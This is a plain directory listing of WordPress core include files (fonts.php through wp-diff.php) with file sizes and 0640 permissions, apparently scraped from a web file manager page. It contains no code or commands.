fonts.php File 9.52 KB 0640
formatting.php File 334.88 KB 0640
functions.php File 280.81 KB 0640
functions.wp-scripts.php File 14.22 KB 0640
functions.wp-styles.php File 8.38 KB 0640
general-template.php File 168.46 KB 0640
global-styles-and-settings.php File 20.76 KB 0640
http.php File 24.72 KB 0640
https-detection.php File 5.72 KB 0640
https-migration.php File 4.63 KB 0640
kses.php File 72.73 KB 0640
l10n.php File 66.92 KB 0640
link-template.php File 154.1 KB 0640
load.php File 55.12 KB 0640
locale.php File 162 B 0640
media-template.php File 61.58 KB 0640
media.php File 215.33 KB 0640
meta.php File 63.71 KB 0640
ms-blogs.php File 25.24 KB 0640
ms-default-constants.php File 4.81 KB 0640
ms-default-filters.php File 6.48 KB 0640
ms-deprecated.php File 21.25 KB 0640
ms-files.php File 2.68 KB 0640
ms-functions.php File 89.44 KB 0640
ms-load.php File 19.42 KB 0640
ms-network.php File 3.69 KB 0640
ms-settings.php File 4.1 KB 0640
ms-site.php File 40.35 KB 0640
nav-menu-template.php File 25.38 KB 0640
nav-menu.php File 43.33 KB 0640
option.php File 100.65 KB 0640
pluggable-deprecated.php File 6.18 KB 0640
pluggable.php File 119.82 KB 0640
plugin.php File 34.63 KB 0640
post-formats.php File 6.94 KB 0640
post-template.php File 67.04 KB 0640
post-thumbnail-template.php File 10.62 KB 0640
post.php File 284.88 KB 0640
query.php File 36.17 KB 0640
registration-functions.php File 200 B 0640
registration.php File 200 B 0640
rest-api.php File 97.91 KB 0640
revision.php File 30.02 KB 0640
rewrite.php File 19.08 KB 0640
robots-template.php File 5.06 KB 0640
rss-functions.php File 255 B 0640
rss.php File 22.57 KB 0640
script-loader.php File 130.14 KB 0640
script-modules.php File 7.53 KB 0640
session.php File 258 B 0640
shortcodes.php File 23.49 KB 0640
sitemaps.php File 3.16 KB 0640
speculative-loading.php File 8.36 KB 0640
spl-autoload-compat.php File 441 B 0640
style-engine.php File 7.39 KB 0640
taxonomy.php File 172.1 KB 0640
template-canvas.php File 544 B 0640
template-loader.php File 2.94 KB 0640
template.php File 23.59 KB 0640
theme-i18n.json File 1.49 KB 0640
theme-previews.php File 2.77 KB 0640
theme-templates.php File 6.09 KB 0640
theme.json File 8.5 KB 0640
theme.php File 131.16 KB 0640
update.php File 36.62 KB 0640
user.php File 171.7 KB 0640
vars.php File 6.41 KB 0640
version.php File 1.09 KB 0640
widgets.php File 69.06 KB 0640
wp-db.php File 445 B 0640
wp-diff.php File 799 B 0640
Filemanager